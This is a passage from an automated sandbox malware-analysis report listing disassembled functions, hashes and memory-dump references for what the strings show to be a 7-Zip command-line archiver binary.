                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$EnterLeavememset
                              • String ID: Would you like to replace the existing file:$with the file from archive:
                              • API String ID: 892811258-686978020
                              • Opcode ID: c881acb3389518f5123ea07b1376a2264f6856e76189f8387ea8ec76bb02d490
                              • Instruction ID: 26e7c1df48cc9d0ed8bba17fcfda6263117155fedb103dd7df6d904c4b09cb21
                              • Opcode Fuzzy Hash: c881acb3389518f5123ea07b1376a2264f6856e76189f8387ea8ec76bb02d490
                              • Instruction Fuzzy Hash: C641B176310687D6EB29DF25DA52BA87321F784B90F4881269F0D47711CF3CC896EB00
                              Function 00FCD178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • Enter password (will not be echoed):, xrefs: 00FCD191
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ConsoleMode$Handlefflushfputs
                              • String ID: Enter password (will not be echoed):
                              • API String ID: 108775803-3720017889
                              • Opcode ID: 294733341af0c6423e331d47aac37afd9992fb5f9bb59514f82aa2bedaed80ed
                              • Instruction ID: 8db25abcbce6ed07766e34da78f3ed0eb87272ef340da1ccadba2eae71bce4f3
                              • Opcode Fuzzy Hash: 294733341af0c6423e331d47aac37afd9992fb5f9bb59514f82aa2bedaed80ed
                              • Instruction Fuzzy Hash: 8A210D2270564383FE24DB65AE55B7D6361AB84BB0F184239DE5A477E0DF7CC886E300
                              Function 00FC0A98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CriticalSectionfputs$EnterLeavefree
                              • String ID: :
                              • API String ID: 1989314732-3653984579
                              • Opcode ID: 839a38f73333893f4eccaf74ee40085ba4c2aa8ed87444e9d780be2ae8fb8cfa
                              • Instruction ID: 40875d1f53f254e486bbe4ea6e0b3d7f5e0fba9f42f8b014a5892ce0ac1bd927
                              • Opcode Fuzzy Hash: 839a38f73333893f4eccaf74ee40085ba4c2aa8ed87444e9d780be2ae8fb8cfa
                              • Instruction Fuzzy Hash: 85311C36200A86C1DB61DF25D8817AD3371FBD4B98F484136DE8D87669DF78C88AE351
                              Function 00FC1240 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsfree
                              • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                              • API String ID: 2581285248-1259944392
                              • Opcode ID: 49505d1af8e5d22842aace44d1ece2333f2758bb853eaa62245607bc15223ccb
                              • Instruction ID: d828d1dd022fed76eaa5b7316f8bb6848238b7a39b1340f95b3c6c15433f8578
                              • Opcode Fuzzy Hash: 49505d1af8e5d22842aace44d1ece2333f2758bb853eaa62245607bc15223ccb
                              • Instruction Fuzzy Hash: A521C766300A4295CE34EB16EC517A93322F789BE8F484227DF4E87765DF6CC586E300
                              Function 00FCE6F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 16libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProc$HandleModule
                              • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                              • API String ID: 667068680-4044117955
                              • Opcode ID: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                              • Instruction ID: 365592ed9f295837116d80b3675a5d3f035b36b18a9dbd1f68f0b1aa3cf9b9b8
                              • Opcode Fuzzy Hash: dd25da05bc82ba6021c17f9e44052074488abcd980775d277f0d9dc0a26f7085
                              • Instruction Fuzzy Hash: B2E09265652A0BC1EE649B52BC9877823A6FB89796F841137C85D86B20EE688199E300
                              Function 00FB61FC Relevance: 10.2, APIs: 8, Instructions: 195COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 01a6a2b08de4f07bd8a7e960d8ce1f279f191e836e97f789a585fd570255e9d4
                              • Instruction ID: 7ba714d79fbb90ee81f01b3c326dde1ea81711ba9ed5af23a6276b128c78700c
                              • Opcode Fuzzy Hash: 01a6a2b08de4f07bd8a7e960d8ce1f279f191e836e97f789a585fd570255e9d4
                              • Instruction Fuzzy Hash: 8661D423608AD096CA31DB26E8412DEB720F7C9BA4F584112EBCE87B19CA7DC546DF51
                              Function 00F81CE0 Relevance: 10.2, APIs: 8, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: de8b0d16ef460631a874cb95a426538ac3ecf037a73c245b98d9b79a720b632d
                              • Instruction ID: 0101fc733d810a75569ab3cf114630ef08fe38a2d91ac9aab9557ec4ce25879d
                              • Opcode Fuzzy Hash: de8b0d16ef460631a874cb95a426538ac3ecf037a73c245b98d9b79a720b632d
                              • Instruction Fuzzy Hash: 02717C32704B4082CB54EF2AD49036D77A4FBC8BA4F144226EB5E47BA4DF39D866DB00
                              Function 00F864E8 Relevance: 10.1, APIs: 8, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID:
                              • API String ID: 1534225298-0
                              • Opcode ID: f9b73384b53ea654a700601d9f87f94090fd67aa3f7ff949fe032c8bbf510844
                              • Instruction ID: f099c2b79c82e4e80d61281d0143a76a431af8370275de0232841d5a4fed3734
                              • Opcode Fuzzy Hash: f9b73384b53ea654a700601d9f87f94090fd67aa3f7ff949fe032c8bbf510844
                              • Instruction Fuzzy Hash: FD412A231492C095CB21EF24D8502EEBB20E7D1794F48C127F78D8BA79DB6DC94AEB01
                              Function 00F98D00 Relevance: 10.1, APIs: 8, Instructions: 90COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: freememmove$ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 1818558235-0
                              • Opcode ID: ca1789519b0bb3c41cd05fb52771422492191473dcd59717bbad5eec481e2bba
                              • Instruction ID: 8686d18d932eb05f9e979afb881692c59b3fb9e670a36e14242f962eb485b358
                              • Opcode Fuzzy Hash: ca1789519b0bb3c41cd05fb52771422492191473dcd59717bbad5eec481e2bba
                              • Instruction Fuzzy Hash: 0C318FB27012548B8BA4DF3BD89241C73A4E759FD83188026DE1D9B708DF39DC92DB50
                              Function 00FBD170 Relevance: 10.1, APIs: 8, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 1b8a1aa51232dedb969a71f5f3019cc1aacb03ae41857c4e251de1aaed421467
                              • Instruction ID: c694d6653ca8656eeea9f539df71a8ae8d1241fe174c19ce5372765aad8ba1b6
                              • Opcode Fuzzy Hash: 1b8a1aa51232dedb969a71f5f3019cc1aacb03ae41857c4e251de1aaed421467
                              • Instruction Fuzzy Hash: B7118623711B8596CB94EB36DD912AC7320FB82BA4F4882329F2D1B751DF29D832D311
                              Function 00FB198E Relevance: 10.0, APIs: 8, Instructions: 42COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: cf44059c6c32b5cb6a0f39292633820c0cbf2afead3bca816bedd606f8241d4f
                              • Instruction ID: 557176b4afee0a8174f1f3a76330969d32fd001f0d83b2890d95be5e0887cde9
                              • Opcode Fuzzy Hash: cf44059c6c32b5cb6a0f39292633820c0cbf2afead3bca816bedd606f8241d4f
                              • Instruction Fuzzy Hash: 41F0F42224565A41C7D0F732DC6552E7710F7C2F81F455022EE4F57715CE2DC4269616
                              Function 00FB18E9 Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: fa36d317f4e258a045e58811932722eef90d09ce1aabdeaf0b4425d617853f98
                              • Instruction ID: 7c6d95d60843fc17a8cb6be56e53547f84e02eab4ee5a42cc2e22e158b42fabf
                              • Opcode Fuzzy Hash: fa36d317f4e258a045e58811932722eef90d09ce1aabdeaf0b4425d617853f98
                              • Instruction Fuzzy Hash: 5DF04F2228A69945CBD0F732CC6556E7710FBC2F80F449022EE4E57712CE2DC426D61A
                              Function 00FB1C61 Relevance: 10.0, APIs: 8, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 021e2c5d6e07651c19eb1ab04e3ea46e36c024787ef77c11b8bc16346f8d79da
                              • Instruction ID: 0d18c85c78d02138aac69f17c85d08ca3299d9ece73b465db9e97c2b300045ce
                              • Opcode Fuzzy Hash: 021e2c5d6e07651c19eb1ab04e3ea46e36c024787ef77c11b8bc16346f8d79da
                              • Instruction Fuzzy Hash: B4F0622624A69D41CBD0F732C86556E7B10FBC7F81F449422EE4E57712CE2DC4369719
                              Function 00FB1A49 Relevance: 10.0, APIs: 8, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 9033fa371487fd137d000dc9ca7ebdd7d74c581a715bbfbf13cd9923f6b6f07d
                              • Instruction ID: d59fa390a120f9449ed8d02997090773547cff1ba47d09e197aaf4a64656ac13
                              • Opcode Fuzzy Hash: 9033fa371487fd137d000dc9ca7ebdd7d74c581a715bbfbf13cd9923f6b6f07d
                              • Instruction Fuzzy Hash: B5F0122224A69941CBD0F732C86556E7710F7C7F81F45A023EE4E57712CE2DC4369616
                              Function 00FB1BB8 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                              • Instruction ID: 465829c81a236ce3b69327d01f1c28fce3ef285c7caaa9cb98a5673ab55b1f28
                              • Opcode Fuzzy Hash: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                              • Instruction Fuzzy Hash: 34F0D02124564D41CBD4FB32C86556E7710FBC6F81F80A422EE4E57721CE2DC426A61A
                              Function 00FB1B04 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: db5ba24876c63a59b12deff57d4e77219ce991600060bb8642b998b56719081c
                              • Instruction ID: 77a84a66d3792d16dd937e83c7235a17b7bc5c8573390a8cc64670c648a52b2a
                              • Opcode Fuzzy Hash: db5ba24876c63a59b12deff57d4e77219ce991600060bb8642b998b56719081c
                              • Instruction Fuzzy Hash: B9F0D02124564D85CBD4FB32C86556E7710FBC6F81F40A422EE4E57721DE2DC427A616
                              Function 00FB1DC0 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 70d84a3f943c915080db66fc4ef9005961add26d4c2fea13df9d6efc16db21ed
                              • Instruction ID: 4b1b29c8a0fccace99918b82af4b3012162e6c24caf3e1030152a34c5e7e7df0
                              • Opcode Fuzzy Hash: 70d84a3f943c915080db66fc4ef9005961add26d4c2fea13df9d6efc16db21ed
                              • Instruction Fuzzy Hash: 5AF0D021245A4E41CBD4FB32C86152E7710FBC2F81F80A022EE4E57725CE2DC466A616
                              Function 00FB1E78 Relevance: 10.0, APIs: 8, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                              • Instruction ID: a2abc732f26e038ad0b1d9cf4db7ac2f59da4e6f8b6f1ab10dc3aeb68f9ff381
                              • Opcode Fuzzy Hash: 808e40649f3ff1102b7b9b6923c4840083597671f555f2f0570c17e7ecd37e27
                              • Instruction Fuzzy Hash: 45F0D02224564D41CBD4FB32D86152E7710FBC6F81F80A422EE4E57721CE2DC426A616
                              Function 00FCB604 Relevance: 10.0, APIs: 8, Instructions: 34COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$fputsmemset
                              • String ID:
                              • API String ID: 469995913-0
                              • Opcode ID: 3d26b01c9de8f9ce5d4e083322491c96ecb96b900abf0e914f1e4e95d5619cf6
                              • Instruction ID: 4953e91477fae9f99112e0fb349dd883515172b22962429c81d6fd4a1f3cee83
                              • Opcode Fuzzy Hash: 3d26b01c9de8f9ce5d4e083322491c96ecb96b900abf0e914f1e4e95d5619cf6
                              • Instruction Fuzzy Hash: 45F0B22225164E81C7D4FF31CC5252D3321E7C1F68F449223EE6D5B2AACE2DC8729355
                              Function 00F9F078 Relevance: 9.2, APIs: 6, Instructions: 236COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmovewcscmp
                              • String ID:
                              • API String ID: 3584677832-0
                              • Opcode ID: 902048628101b1f4872e76a68c814bc250ca6d04f87651deefdc32b1519b838b
                              • Instruction ID: 8e2f3bb293a1825304120c131811ff8ea2dbea19ada9b98daede7ba2d696266e
                              • Opcode Fuzzy Hash: 902048628101b1f4872e76a68c814bc250ca6d04f87651deefdc32b1519b838b
                              • Instruction Fuzzy Hash: 6281BF37A00A85D6DF30EF16D89066D3361F345BA4B548237DB2A87764DB38C8DAE741
                              Function 00F7138C Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 176COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                              • API String ID: 1294909896-2104980125
                              • Opcode ID: fa4bd49c965dcdda29a0285ec97260334eaa4a784f4e475590323ac15a4d6e35
                              • Instruction ID: cbdf7e458dad0783449065d86e3891049c041aef0c0a1b4e10ae99aae3087f5b
                              • Opcode Fuzzy Hash: fa4bd49c965dcdda29a0285ec97260334eaa4a784f4e475590323ac15a4d6e35
                              • Instruction Fuzzy Hash: 5161C373A14681A6CB20EF29D98076E7762F3817A4F88D113DA8E4B645EB38C54DE702
                              Function 00FBDF30 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 133COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: #
                              • API String ID: 1534225298-1885708031
                              • Opcode ID: 9f75db4a75c95e80460666ce991bc5cb072ca817b398ef2d3bb69d1fa6707b94
                              • Instruction ID: de1921dfb032347c73c5b61977158581478bd1f69c41a809b26493963badaba8
